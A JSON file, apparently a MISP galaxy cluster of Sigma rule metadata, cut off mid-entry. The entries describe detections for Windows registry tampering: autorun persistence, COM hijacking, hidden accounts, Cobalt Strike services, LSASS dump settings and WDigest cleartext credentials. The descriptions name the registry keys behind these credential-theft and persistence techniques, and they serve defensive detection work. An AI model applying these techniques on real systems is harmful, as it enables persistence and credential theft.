{ "authors": [ "@Joseliyo_Jstnk" ], "category": "rules", "description": "MISP galaxy cluster based on Sigma Rules.", "name": "Sigma-Rules", "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", "type": "sigma-rules", "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "values": [ { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", "value": "CurrentVersion Autorun Keys Modification" }, { "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", "meta": { "author": "frack113", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate use" ], "filename": 
"registry_set_treatas_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "value": "COM Hijacking via TreatAs" }, { "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence, which will get invoked when an application crashes", "meta": { "author": "frack113", "creation_date": "2022-08-07", "falsepositive": [ "Legitimate use of the key to set up a debugger. 
This is often the case on developer machines" ], "filename": "registry_set_dbgmanageddebugger_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/last-byte/PersistenceSniper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1574" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", "value": "Potential Registry Persistence Attempt Via DbgManagedDebugger" }, { "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "registry_set_policies_attachments_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "value": "Potential Attachment Manager Settings Attachments Tamper" }, { "description": "Detects .NET Framework CLR and .NET Core CLR \"cor_enable_profiling\" and \"cor_profiler\" variables being set and configured.", "meta": { "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), 
Jimmy Bayne (@bohops)", "creation_date": "2020-09-10", "falsepositive": [ "No established falsepositives" ], "filename": "registry_set_enabling_cor_profiler_env_variables.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.sans.org/cyber-security-summit/archives", "https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling", "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", "https://twitter.com/jamieantisocial/status/1304520651248668673", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.012" ] }, "related": [ { "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "value": "Enabling COR Profiler Environment Variables" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", 
"https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "value": "System Scripts Autorun Keys Modification" }, { "description": "Detects changes to the registry values related to outlook security settings", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Administrative activity" ], "filename": "registry_set_office_outlook_security_settings.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", "https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "value": "Outlook Security Settings Updated - Registry" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate 
reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "value": "Wow6432Node CurrentVersion Autorun Keys Modification" }, { "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "registry_set_wab_dllpath_reg_change.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", "https://twitter.com/Hexacorn/status/991447379864932352", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", "value": "Execution DLL of Choice Using WAB.EXE" }, { "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Unlikely" ], "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"42205c73-75c8-4a63-9db1-e3782e06fda0", "value": "Suspicious Application Allowed Through Exploit Guard" }, { "description": "Detects potential persistence activity via the registration of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-30", "falsepositive": [ "Many legitimate applications can register a new custom protocol handler. Additional filters need to be applied according to your environment." ], "filename": "registry_set_persistence_custom_protocol_handler.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "value": "Potential Persistence Via Custom Protocol Handler" }, { "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence, which will get invoked when an application crashes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate use of the key to set up a debugger. 
This is often the case on developer machines" ], "filename": "registry_set_aedebug_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/aedebug.html", "https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "092af964-4233-4373-b4ba-d86ea2890288", "value": "Add Debugger Entry To AeDebug For Persistence" }, { "description": "Detects registry value settings that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)", "creation_date": "2023-12-21", "falsepositive": [ "Administrative scripts that change the desktop background to a company logo or other image." 
], "filename": "registry_set_desktop_background_change.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.attackiq.com/2023/09/20/emulating-rhysida/", "https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_desktop_background_change.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1112", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85b88e05-dadc-430b-8a9e-53ff1cd30aae", "value": "Potentially Suspicious Desktop Background Change Via Registry" }, { "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.\n", "meta": { "author": "frack113", "creation_date": "2023-01-27", "falsepositive": [ "Installers and updaters may set currently in use files for rename or deletion after a reboot." 
], "filename": "registry_set_susp_pendingfilerenameoperations.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6", "https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html", "https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN", "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "value": "Potential PendingFileRenameOperations Tampering" }, { "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", "meta": { "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "creation_date": "2018-04-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_globalflags.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.defense-evasion", "attack.t1546.012", "car.2013-01-002" ] }, "related": [ { "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", "value": "Potential Persistence Via GlobalFlags" }, { "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "registry_set_policies_associations_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "value": "Potential Attachment Manager Settings Associations Tamper" }, { "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2022-07-12", "falsepositive": [ "Unknown" ], "filename": "registry_set_special_accounts.yml", "level": "high", 
"logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.002" ] }, "related": [ { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "value": "Hiding User Account Via SpecialAccounts Registry Key" }, { "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community", "creation_date": "2018-07-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_susp_reg_persist_explorer_run.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", "value": "Registry Persistence via Explorer Run Key" }, { "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\n", "meta": { "author": "Wojciech Lesicki", "creation_date": "2021-06-29", "falsepositive": [ 
"Unlikely" ], "filename": "registry_set_cobaltstrike_service_installs.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "value": "Potential CobaltStrike Service Installations - Registry" }, { "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.\n", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Unknown" ], "filename": "registry_set_lsa_disablerestrictedadmin.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", 
"https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "value": "RestrictedAdminMode Registry Value Tampering" }, { "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Techniques such as LSASS Shtinkering require this value to be \"2\" in order to dump LSASS.", "meta": { "author": "@pbssubhash", "creation_date": "2022-12-08", "falsepositive": [ "Legitimate applications that need to do a full dump of their process" ], "filename": "registry_set_lsass_usermode_dumping.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "value": "Lsass Full Dump Request Via DumpType Registry Settings" }, { "description": "Detects changes to the \"DisableHypervisorEnforcedPagingTranslation\" registry 
value, where it is set to \"1\" in order to disable the Hypervisor Enforced Paging Translation feature.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf", "https://twitter.com/standa_t/status/1808868985678803222", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f2954d2-99c2-4d42-a065-ca36740f187b", "value": "Hypervisor Enforced Paging Translation Disabled" }, { "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-09-12", "falsepositive": [ "Unknown" ], "filename": "registry_set_wdigest_enable_uselogoncredential.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials", 
"https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", "https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", "value": "Wdigest Enable UseLogonCredential" }, { "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", "meta": { "author": "Dimitrios Slamaris", "creation_date": "2017-05-15", "falsepositive": [ "Unknown" ], "filename": "registry_set_dhcp_calloutdll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002", "attack.t1112" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", "value": "DHCP 
Callout DLL Installation" }, { "description": "Detects potential persistence activity via outlook today page.\nAn attacker can set a custom page to execute arbitrary code and link to it via the registry values \"URL\" and \"UserDefinedUrl\".\n", "meta": { "author": "Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand", "creation_date": "2021-06-10", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_outlook_todaypage.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74", "https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml" ], "tags": [ "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "value": "Potential Persistence Via Outlook Today Page" }, { "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "This rule is to explore new applications on an endpoint. False positives depends on the organization.", "Newly setup system.", "Legitimate installation of new application." 
